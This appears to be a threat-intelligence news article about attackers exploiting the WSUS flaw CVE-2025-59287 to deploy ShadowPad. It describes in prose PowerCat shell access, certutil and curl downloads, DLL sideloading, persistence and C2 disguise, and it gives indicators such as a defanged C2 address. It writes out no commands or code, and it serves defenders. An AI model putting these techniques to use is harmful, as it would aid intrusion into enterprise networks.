Chinese-backed attackers are actively exploiting a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute the sophisticated ShadowPad backdoor malware. This exploitation, leveraging CVE-2025-59287, allows threat actors to gain system-level access and compromise enterprise networks running the WSUS infrastructure. The surge in activity follows the public release of proof-of-concept code for the vulnerability in October, indicating a rapid adoption by malicious actors keen on leveraging this new attack vector.
The attack chain commences with threat actors targeting Windows Servers configured with WSUS. By exploiting CVE-2025-59287, they achieve initial system access. Once a foothold is established, the attackers proceed to deploy PowerCat, an open-source PowerShell-based utility. PowerCat provides direct command shell access, serving as the first-stage tool that enables the subsequent execution of commands necessary for deploying more advanced malware, including the ShadowPad backdoor.
Chinese Hackers Exploit WSUS Vulnerability for ShadowPad Deployment
Security analysts at ASEC first identified this new attack pattern after observing the use of PowerCat execution commands in ongoing malicious activities. The researchers detailed a method where threat actors employ legitimate Windows utilities, such as certutil and curl, to download and install ShadowPad. This technique is particularly effective at evading detection, as these tools are standard components of Windows operating systems, making their usage less conspicuous to security monitoring systems.
The observed malicious activity on November 6th involved attackers downloading multiple encoded files. These files were subsequently decoded and executed, ultimately delivering the ShadowPad payload to compromised systems. This methodology highlights the attackers’ reliance on stealthy techniques to infiltrate and maintain access within targeted networks.
Persistence Through DLL Sideloading
ShadowPad employs a sophisticated evasion technique known as DLL sideloading to ensure its persistence and operational security. Instead of running as an independent executable file, the malware leverages a legitimate Windows application, specifically ETDCtrlHelper.exe. This legitimate program is tricked into loading a malicious Dynamic Link Library (DLL) file that shares the same name, ETDApix.dll.
When the legitimate ETDCtrlHelper.exe is executed, it inadvertently loads the compromised ETDApix.dll. This malicious DLL then acts as a loader for the core ShadowPad backdoor, which operates entirely in memory. The actual malware functionality and its complete backdoor configuration data are stored within a temporary file, further obscuring its presence and making it harder to detect through traditional file-scanning methods.
To maintain its presence on an infected system, ShadowPad establishes persistence by creating services, registry entries, and scheduled tasks under the identifier “Q-X64.” Communication with command-and-control (C2) servers, identified at the IP address 163.61.102[.]245, is conducted using standard HTTP and HTTPS protocols. Intriguingly, the malware disguises its C2 traffic to resemble that of a legitimate Firefox browser, utilizing common Firefox headers to blend in with normal network activity.
Furthermore, ShadowPad exhibits the capability to inject itself into various system processes, including Windows Mail, Media Player, and svchost services. This multi-process injection enhances its ability to evade detection and persist across different system functions.
Organizations that utilize WSUS are strongly advised to promptly apply Microsoft’s security update addressing CVE-2025-59287. Additionally, continuous monitoring of server logs for suspicious PowerShell, certutil, and curl execution patterns is crucial for detecting potential compromise attempts. The ongoing exploitation of this vulnerability underscores the importance of timely patching and vigilant network security practices to mitigate the risk posed by advanced persistent threats.